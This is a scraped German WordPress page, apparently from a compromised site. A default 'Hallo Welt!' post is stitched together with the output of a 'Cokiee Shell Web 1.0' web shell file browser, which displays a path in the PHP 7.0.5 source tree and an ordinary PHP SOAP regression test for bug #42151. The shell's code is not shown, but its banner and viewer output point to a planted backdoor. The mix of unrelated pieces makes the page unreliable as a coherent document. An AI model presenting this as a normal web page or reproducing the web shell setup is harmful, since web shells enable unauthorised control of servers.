Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/soap/tests/bugs/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/soap/tests/bugs/bug42151.phpt |
--TEST-- Bug #42151 (__destruct functions not called after catching a SoapFault exception) --SKIPIF-- <?php require_once('skipif.inc'); ?> --FILE-- <?php class foo { function __construct(){ $foo = @ new SoapClient('httpx://'); } function __destruct(){ echo 'I never get executed.' . "\n"; } } class bar { function __destruct(){ echo 'I don\'t get executed either.' . "\n"; } } try { $bar = new bar(); $foo = new foo(); } catch (Exception $e){ echo $e->getMessage() . "\n"; } echo "ok\n"; ?> --EXPECT-- SOAP-ERROR: Parsing WSDL: Couldn't load from 'httpx://' : failed to load external entity "httpx://" ok I don't get executed either.
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare